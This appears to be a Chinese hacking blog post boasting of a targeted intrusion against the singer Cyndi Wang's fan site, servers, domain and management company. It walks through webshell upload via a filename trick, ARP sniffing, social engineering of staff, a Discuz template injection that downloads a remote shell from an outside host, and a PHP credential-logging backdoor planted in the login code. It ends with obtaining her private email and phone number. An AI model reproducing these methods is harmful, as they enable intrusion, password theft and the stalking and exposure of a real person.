From:www.3est.com 
Author:Mars 
前几天,听说Cyndi出新专辑了,哥好激动啊..听了几天Music.突然萌发了个思想!想了解更多的有关于她的资料.下面一出好戏即将上演!

总共有三个步骤 :1.先分析 2.再踩点 3.最后渗透

拿到一个目标要先学会分析,首先Cyndi是位明星,所以利用搜索引擎是不可能搜索到什么有价值的信息. 
一般明星在网络上都有自己的Fans基地,好吧.目标已经确定了!
通过百度搜索到一个她留言过的Fans基地www.CyndiFans.net
既然目标确定了,该执行第二步了.去ip.3est.com 反查询一下它所在的服务器上还有其他站点没!查询结果如下: 
clip_image001

大概看了下,基本都采用Dz7.0+Uchome+SiteSuper7.5 组合! 
手里又没0day.所以没抱有太大希望.只好采用ARP方式来看看能获得什么有价值的信息,首先得先获得C段一台服务器权限, 
拿出平时常用的Hscan 来扫描一下有C段没有Ftp弱口令. 
悲剧了!竟然一个没扫出来.接着用IIS利用工具扫描下C段.记录装有IIS6.0的服务器IP 
因为他的IP是xx.xx.xx.154 大多数情况是1或者129作为网关,叫前C段和后C段,154距离129比较,所以目标放在129-255之间!
然后进入cn.bing.com输入ip:xx.xx.xx.xx 搜索下后C段装有IIS6.0的服务器IP 看看有什么站.一般各类型网站多的的就是虚拟主机,排除掉这些, 
就剩下2台主机了..汗 真郁闷..那么集中精力看看其中一台xx人才网,wwwscan扫描下没扫描到有价值东西,进入网站转悠了半天, 
在他的分站点了个图片属性,路径是ewe我猜想了下应该是Ewebeditor这个编辑器,输入ewe/admin/admin_login.asp 发现后台被删了, 
数据库是默认的先下载下来看看有没有被人搞过,结果失望了.运气不怎么好..先休息下再搞了..去群里聊了会天
过几个小时,来了精神.继续在它的网站转悠,我觉得问题最多的还是上传的地方,就注册了个会员.进入管理中心没有发现什么上传的位置, 
接着又注册了个企业会员.发现了个上传企业照片的地方.把小马改成1.asp;.jpg格式结果上传成功了.没提示路径.用抓包工具看一下. 
总算见到可爱的小马..拿到webshell之后,开始提权,结果那破服务器慢的要死.开个高速VPN,速度果然提升了.随便看了下感觉提权无望. 
.基本组建都被卸载了.目录还不能查看.有SU不过是9.1版本没溢出漏洞.唉 权限配置的很死.看来管理员挺懂安全啊.看了下配置文件最后发现个sa, 
哈哈 激动死了!直接加系统用户拿到服务器权限.然后更变态的事情发生了.进去看任务管理器竟然CPU100%总共运行72个进程.. 
我的天啊…这么破烂的服务器一ARP不就挂掉了.我一个一个把没用的进程结束掉.到30个进程了.在结束服务器就挂了. 
然后打开我的电脑管理想看看这服务器是什么高级配置.结果点了属性Shell32.dl被禁,进C盘弹出拒绝访问..打开网页不让下载东西.. 
一系列的问题皆然发生!终于把Cain放到服务器了.还好不出我所预料.这个服务器网关是129. 哈哈只能扫到后C段的服务器Mac . 
然后开始ARP 154这个主机,嗅探开始了.他服务器装有ARP防火墙软件把发送的数据给拦截了.. 
这时候想起玫瑰的ARP突破方法,结果试验了下没成功,后来配合幻境网盾用了下.成功欺骗突破防火墙.终于嗅探到数据了, 
挺高兴的.结果5秒钟都没,Cain卡爆了!服务器挂了10分钟我才登录上.发现嗅探到的3万多个Http信息竟然都是盛大传奇的, 
我纳闷了会,地址确实是盛大的! 
clip_image002

看了下mssql嗅探到了几个SA密码.接着又拿下一台速度比较好点的服务器.接着刚才的工作.开始ARP. 
我在网站找到管理员的QQ加了他.! 
我说: 
你好!请问你是cyndifans.net的管理么 ?
NiKai: 

我说
我的账户丢失了怎么办 能帮我找回下么 ?
NiKai: 
请问你用户名是?
我说: 
christa

NiKai : 
请使用找回密码功能http://www.cyndifans.net/logging.php?action=login
我说: 
我以前的电子邮件过期了. 
NiKai: 
能否告诉我你的注册时间和最后登录时间? 
我说: 
记不起来了。。

NiKai: 
大概的
NiKai: 
还有电子邮件地址是什么? 
NiKai: 
邮件地址
我说: 
以前注册的[email protected]好像是163还是126..记不大清楚了! 
NiKai: 
什么时候发现不能登录或者发现忘记密码的? 
我说: (PS:其实我啥信息没有!去论坛看见个账户就随便说的.快露馅 该转移话题了!) 
对了!请问那个会员卡有什么作用 ? 能了解心凌最新消息?
NiKai : 
凌盟永久会员
可以通过短信等方式获取最新消息
以及更多特权和购买专辑等优惠
还有参与活动等优先权
我说: 
哦~没什么别的待遇么。。能得到签名么

NiKai

预购专辑有签名啊
NiKai

重置密码为:123456 登录后尽快修改密码!
我说(PS:哈哈 像想让我快点加入会员!我就不加气死你!) 
嗯 麻烦你了

NiKai 
你要买吗?会员卡 年后会提价年后价格应该在50-68元之间! 
我说
我没办理网上银行。。

NiKai

可以银行转账
NiKai 
我可以给你账号
我说

嗯,好的! 
NiKai 
中国工商银行上海市新灵路支行
受款帐号:10011XXXXX21135XXXX 
户名:XXX 
http://www.xxx.com/abouts/payment.php
银行汇款(到账时间部分实时,部分1-5工作日)
我说
好的 我打的时候联系下你

NiKai 
好的! 
我说
麻烦了。

成功嗅探到管理员的登录密码.接着进入后台
clip_image003

在模板任意位置插入
{eval copy('http://www.3est.com/mars.txt', DISCUZ_ROOT.'./forumdata/shell.php'); 
然后更新缓存.结果他的缓存目录竟然无写入权限… 
clip_image004

没办法了
在后台查看了Cyndi的注册资料和最后登录IP地址.IP138查一下是台湾的.这差不多就是她家IP了.光拿到这个还不够,继续渗透…主要是拿Cyndi的密码,那只有Webshell或者服务器权限的情况下才能拿下数据库.这是一件比较难的差事.ARP到3389登录密码成功率很低的.只嗅探Ftp Mysql RDP ,过了2天嗅探出FTP了
clip_image006

成功登录FTP之后,传个webshell
clip_image008

clip_image009

结果服务器权限很死,ping 下是su8的FTP 
然后通过 空虚浪子心写的EXP提到服务器!
然后BT的事情出现了。
clip_image011

C盘没访问权限,打开属性提升用户组
clip_image012

这个服务器安全做的不错,一堆东西没权限运行。

既然这样,在看看注册表是否被封锁了。什么都不让下载,更别说复制了。
只能靠WebShell上传个cmd.exe来克隆下超级管理
clip_image014

clip_image016

至此,第一阶段渗透完毕!

去数据库找王心凌密码,DZ采用的是salt方式,随机获得一个字符串,然后把明文密码MD5之后,再与随机字符串连接起来之后,再次MD5。
这样可极大的提高安全系数。
只好在记录明文密码了。
修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') { 
下加入如上代码,在网站admin目录下生成include.txt

$ip=$_SERVER['REMOTE_ADDR']; 
$showtime=date("Y-m-d H:i:s"); 
$record="".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n"; 
$handle=fopen('./admin/include.txt','a+'); 
$write=fwrite($handle,$record); 
clip_image017

等着王心凌上论坛。
下面做其他工作。
先抓取下管理的Hash 
clip_image019

跑出密码!
继续把服务器数据库连接密码,缓存密码,FTP密码都收集下!
去ip866查询域名的注册邮箱是[email protected],然后反查下出现了Cyndi.com.cn这个域名,让我感到****了。先看看他域名注册的地方,
一个是新网,一个是万网,先解决新网的,百度搜索了下他的信息很散,不过经过一下午的搜索基本信息已经确定。
clip_image020

接着试了几个密码进来了。
clip_image022

很快,把所有密码整理下,然后猜想下就出来了。
clip_image024

继续搜索资料,找DNS管理页面

clip_image026

然后社工到QQ密码,然后进入QQ网络硬盘,找有价值信息,成功拿到cyndi.com.cn管理权限。

经过收集资料,在百度贴吧找到她ID,搜狐BLOG 台湾雅虎BLOG 
经过调查发现那个搜狐BLOG是她的经纪人帮她发的,
只有翻墙去台湾BLOG,
clip_image028

2010-1-13 20:25 
收集了点资料,
1、起初为了社工心凌创办的经济公司的EMAIL,依靠的是雅虎订阅信息得到EMAIL,然后通过找回密码,密码问题是她姓名,更何况我又不知道她是谁,与他们公司的关系及职位,我猜想,他们公司人数不会太多,估计也就两三个。
2、百度找到他们公司电话,打过去,然后说,请问您的贵姓 接着一个女的说 ?好甜美的话语啊,我于是蠢蠢欲动了几秒,接着说,女士您贵姓,她说姓米,我说 米小姐,请问怎么能够拿到心凌的签名,她给我了个电话让我联系一个唱片公司。接着挂电话了
3、过半天之后 再打电话给她经济公司,说请问张XX小姐在么?
4、我听了语音,是另外个女的接的电话,她说请问你是不是找张小姐,接着找个借口挂了电话!
5、然后登录Email通过密码提示找回密码,输入姓名,成功进入!
进入邮箱打开通讯录,拿到了本人的手机,王心凌的私人EMAIL和手机,然后这个密码正好是她EMAIL的。。就不截图了,免的被人破坏。
渗透结束!有时间找她聊聊哈。
clip_image030

源链接

Hacking more

...